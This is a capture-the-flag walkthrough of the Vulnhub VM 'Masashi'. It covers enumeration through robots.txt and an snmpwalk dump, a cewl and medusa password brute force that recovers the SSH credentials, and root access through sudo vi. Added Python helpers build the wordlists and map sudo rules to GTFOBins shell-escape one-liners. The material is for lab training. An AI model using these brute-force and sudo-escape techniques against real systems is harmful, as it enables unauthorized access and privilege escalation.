Masashi (Vulnhub)
A write-up on the Vulnhub VM by Donald @lorde_zw
This is an excellent beginner box by Donald. The emphasis is on enumeration and on how easily one can fall into a rabbit hole by overzealously following the initial enumeration like an automaton. Although it could be argued that following it 100% like an automaton could land you on the correct path :-)
/etc/hosts
It is a good habit, learned from HackTheBox, to always add an entry for the target in /etc/hosts. This helps where a vhost brute force is necessary. Since these notes are written after the fact, it is not necessary to go down the vhost brute-force route here.

nmap
We run our nmap scan.
TCP ports 22 and 80 are open. There is not much one can do with the SSH port (22). There is a man-in-the-middle vulnerability associated with this version and you can read more about it here. That is not the vector pursued in this write-up, as I believe it is not the intended route for exploitation.

A UDP scan was abandoned after 1 hour due to apparent rate-limiting issues I could not resolve. The scan did find one open port, but it was abandoned before nmap could identify the service on it.

Taking a look at port 80, we arrive at the default Apache page. There is no menu to click through.

A common practice on beginner CTF boxes is to try browsing to /robots.txt; it is a useful shortcut when you are in a hurry. A gobuster scan enumerates files more thoroughly.
Gobuster reveals two files we can follow: /robots.txt and /security.txt.

We follow /robots.txt, which reveals three more files we can browse: /snmpwalk.txt, /sshfolder.txt and /security.txt.

We have a look at these files. First, /snmpwalk.txt contains what appears to be an SNMP walk of the target. The TFTP entry stands out, and our earlier UDP scan did indicate at least one open UDP port. This suggests that UDP port 1337 may be open.

When we run an nmap UDP scan against that specific port, we get confirmation that it is indeed open.
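The cross-check above is worth automating: an snmpwalk dump lists listening sockets (UDP-MIB/TCP-MIB) and running processes with their arguments (HOST-RESOURCES-MIB), so a few lines of parsing tell you which UDP ports to hand to nmap and which daemon owns them. The following is an added example written for this write-up, not code from the original post or from the box; the snmpwalk lines are a constructed sample in net-snmp's output format (hostname, PIDs and the tftpd arguments are illustrative), not the contents of the box's /snmpwalk.txt.

```python
import re
from collections import defaultdict

# Constructed sample in the line format net-snmp's snmpwalk prints; it stands in
# for the box's /snmpwalk.txt, which is not reproduced here. Hostname, PIDs and
# the tftpd arguments are illustrative.
SAMPLE_SNMPWALK = """\
SNMPv2-MIB::sysDescr.0 = STRING: Linux target 4.15.0-99-generic #100-Ubuntu SMP x86_64
SNMPv2-MIB::sysName.0 = STRING: target
HOST-RESOURCES-MIB::hrSWRunName.612 = STRING: "sshd"
HOST-RESOURCES-MIB::hrSWRunName.640 = STRING: "apache2"
HOST-RESOURCES-MIB::hrSWRunName.701 = STRING: "in.tftpd"
HOST-RESOURCES-MIB::hrSWRunParameters.612 = STRING: "-D"
HOST-RESOURCES-MIB::hrSWRunParameters.640 = STRING: "-k start"
HOST-RESOURCES-MIB::hrSWRunParameters.701 = STRING: "--listen --user tftp --address 0.0.0.0:1337 --secure /srv/tftp"
TCP-MIB::tcpConnState.0.0.0.0.22.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.0.0.0.0.80.0.0.0.0.0 = INTEGER: listen(2)
UDP-MIB::udpLocalAddress.0.0.0.0.161 = IpAddress: 0.0.0.0
UDP-MIB::udpLocalPort.0.0.0.0.161 = INTEGER: 161
UDP-MIB::udpLocalAddress.0.0.0.0.1337 = IpAddress: 0.0.0.0
UDP-MIB::udpLocalPort.0.0.0.0.1337 = INTEGER: 1337
"""

# MIB::object.index = TYPE: value   (TYPE is absent for empty strings)
LINE_RE = re.compile(
    r"^(?P<mib>[\w-]+)::(?P<obj>\w+)(?:\.(?P<idx>[\d.]+))?\s*=\s*"
    r"(?:(?P<type>[A-Za-z-]+):\s*)?(?P<val>.*)$"
)


def parse_snmpwalk(text):
    """Yield (object, index, type, value) for every line that parses; others are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield (m.group("obj"), m.group("idx") or "", m.group("type"),
                   m.group("val").strip().strip('"'))


def summarize(text):
    """Collect listening TCP/UDP ports and running processes from an snmpwalk dump,
    then attribute each UDP port to the process whose arguments mention it."""
    tcp_ports, udp_ports = set(), set()
    procs = defaultdict(dict)  # pid -> {"name": ..., "args": ...}
    for obj, idx, _typ, val in parse_snmpwalk(text):
        if obj == "udpLocalPort":
            udp_ports.add(int(val))
        elif obj == "tcpConnState" and val.startswith("listen"):
            # index layout: localAddr(4 octets).localPort.remAddr(4 octets).remPort
            tcp_ports.add(int(idx.split(".")[4]))
        elif obj == "hrSWRunName":
            procs[idx]["name"] = val
        elif obj == "hrSWRunParameters":
            procs[idx]["args"] = val
    owners = {}
    for port in udp_ports:
        # a bare "1337" with no digit on either side, e.g. "--address 0.0.0.0:1337"
        hits = [p["name"] for p in procs.values()
                if "name" in p and re.search(rf"(?<!\d){port}(?!\d)", p.get("args", ""))]
        owners[port] = hits[0] if hits else None
    return {"tcp": sorted(tcp_ports), "udp": sorted(udp_ports), "udp_owner": owners,
            "processes": sorted(p["name"] for p in procs.values() if "name" in p)}


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_SNMPWALK).items():
        print(f"{key}: {value}")
```

On the sample this attributes UDP 1337 to in.tftpd and leaves 161 unattributed (snmpd does not put its port on its command line), which is exactly the kind of hint that turns a slow, rate-limited full UDP sweep into a single-port nmap -sU check.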

Let us return to the files listed in /robots.txt earlier. We have not looked at /sshfolder.txt yet, but when we do, we find details about a possible SSH username. We learn that the username is probably sv5 and that in the root of the TFTP service we should find a world-readable file called id_rsa.pub. A public key on its own does not log anyone in (that needs the matching private key), but it tells us key-based SSH access is set up for sv5 and is worth a look. We will pursue that in a moment.

Let us visit the last entry on /robots.txt. It turns out to be the obligatory taunt which is common among CTF box creators :-). Hats off to you @lorde_zw

Now we return to that TFTP service in pursuit of the id_rsa.pub file. Instead, we find a hint to use a password-list generating tool called cewl, which sources words from a web page.

So we do that: we use cewl to create a password list from the index page, as suggested by the creator.
Then we try hydra with our custom password list and immediately regret the decision, because hydra is very slow for this task.
Instead, we try medusa
... and after a few seconds, we profit! The username is sv5 and the password is whoistheplug.
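What cewl actually does with a page is simple enough to reproduce, and seeing it spelled out explains why the index page was worth harvesting: every visible word above a minimum length becomes a candidate, while scripts, stylesheets and comments are ignored. The block below is an added example for this write-up, not the author's command or cewl's own code; SAMPLE_HTML is a constructed page that stands in for the box's index page (which is not reproduced here), and the lowercased variants it adds are my own choice, not cewl's default behaviour.

```python
import re
from html.parser import HTMLParser

# Constructed sample page; it stands in for the target's index page, which is
# not reproduced here. The words on it are illustrative.
SAMPLE_HTML = """<html><head><title>Welcome</title>
<script>var tracking = "ignoreme";</script>
<style>.hero { color: red; }</style></head>
<body><h1>Masashi Records</h1>
<p>Nobody knows WhoIsThePlug, but everybody asks whoistheplug.</p>
<p>Contact us at info@example.invalid for bookings &amp; press.</p>
<!-- todo: remove staging banner -->
</body></html>"""

WORD_RE = re.compile(r"[A-Za-z]+")


class TextExtractor(HTMLParser):
    """Collect visible text only: <script>/<style> bodies and comments are dropped,
    which is the same filtering a wordlist scraper like cewl applies."""
    SKIP = {"script", "style"}

    def __init__(self):
        super().__init__()          # convert_charrefs=True turns &amp; into &
        self.chunks = []
        self._skip_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in self.SKIP:
            self._skip_depth += 1

    def handle_endtag(self, tag):
        if tag in self.SKIP and self._skip_depth:
            self._skip_depth -= 1

    def handle_data(self, data):
        if not self._skip_depth:
            self.chunks.append(data)


def wordlist_from_html(html, min_len=5, add_lowercase=True):
    """Return candidate passwords in first-seen order with duplicates removed.
    add_lowercase also emits a lowercased copy of each word (my addition: users
    rarely keep a page's capitalisation in a password)."""
    parser = TextExtractor()
    parser.feed(html)
    parser.close()
    text = " ".join(parser.chunks)
    seen, words = set(), []

    def add(word):
        if len(word) >= min_len and word not in seen:
            seen.add(word)
            words.append(word)

    for word in WORD_RE.findall(text):
        add(word)
        if add_lowercase:
            add(word.lower())
    return words


if __name__ == "__main__":
    # one word per line is what hydra/medusa expect in a -P file
    print("\n".join(wordlist_from_html(SAMPLE_HTML)))
```

Run it, redirect the output to a file and hand that file to medusa as the password list. The filter matters in both directions: the JavaScript string "ignoreme" and the HTML comment never reach the list, while the page title does, since the title is visible text.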

We try those details on SSH and we log in successfully.

As we cat user.txt, we are greeted with a lovely message from the creator, @lorde_zw Donald Munengiwa.

Now on to privilege escalation. A habit I have developed is to run sudo -l first, on the chance that we are in sudoers, even before running the awesome Privilege Escalation Awesome Script (thank you, IppSec). So let us do that.

That tells us that we can run VIM (vi) with escalated privileges. VIM is one of the living-off-the-land binaries listed on GTFOBins that can be used to break out into a privileged shell under these circumstances. So we try that. It is better shown in the .gif below.
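Reading sudo -l output by eye works on a one-line box like this one; on anything larger it helps to parse it and flag the entries that GTFOBins says can spawn a shell. The block below is an added example for this write-up and is not the author's procedure or any tool's code. SAMPLE_SUDO_L is a constructed sudo -l listing in the usual Ubuntu layout (the hostname and the find/less entries are illustrative, only the vi entry mirrors what the write-up reports), and the escape commands in GTFOBINS_ESCAPES are reproduced from GTFOBins from memory, so confirm them on the site before relying on them.

```python
import re

# Constructed sample of "sudo -l" output. Only the vi line mirrors the box;
# the hostname and the find/less rule are illustrative.
SAMPLE_SUDO_L = """\
Matching Defaults entries for sv5 on target:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User sv5 may run the following commands on target:
    (ALL : ALL) NOPASSWD: /usr/bin/vi
    (root) /usr/bin/find, /usr/bin/less
"""

# Shell escapes as listed on GTFOBins (from memory; verify on the site).
GTFOBINS_ESCAPES = {
    "vi":   "sudo vi -c ':!/bin/sh'",
    "vim":  "sudo vim -c ':!/bin/sh'",
    "find": "sudo find . -exec /bin/sh \\; -quit",
    "less": "sudo less /etc/profile   (then type !/bin/sh at the prompt)",
    "awk":  "sudo awk 'BEGIN {system(\"/bin/sh\")}'",
    "env":  "sudo env /bin/sh",
}

# "(runas[ : group]) [TAG: ...] /path/one, /path/two"
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return one dict per permitted command found after the 'may run' header."""
    rules, in_cmds = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if "may run the following commands" in line:
            in_cmds = True          # everything before this is Defaults noise
            continue
        if not in_cmds or not line:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()          # "(ALL : ALL)" -> "ALL"
        tags = {t.strip(": ") for t in re.findall(r"[A-Z]+:", m.group("tags"))}
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            binary = cmd.split()[0].rsplit("/", 1)[-1]          # "/usr/bin/vi" -> "vi"
            rules.append({
                "runas": runas,
                "nopasswd": "NOPASSWD" in tags,
                "command": cmd,
                "escape": "any command" if cmd == "ALL" else GTFOBINS_ESCAPES.get(binary),
            })
    return rules


def root_shell_candidates(text):
    """Rules that can become a root shell: run as root (or ALL) with a known escape."""
    return [r for r in parse_sudo_l(text)
            if r["runas"] in ("ALL", "root") and r["escape"]]


if __name__ == "__main__":
    for r in root_shell_candidates(SAMPLE_SUDO_L):
        pw = "no password" if r["nopasswd"] else "password required"
        print(f"{r['command']} ({pw}): {r['escape']}")
```

The vi entry is the interesting one: it runs as ALL with NOPASSWD, so the GTFOBins one-liner drops straight into a root shell without ever prompting, which is what the .gif in the original write-up demonstrates. The NOPASSWD distinction is worth keeping in the output, because a rule that still asks for the user's password is only useful once you actually have that password.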
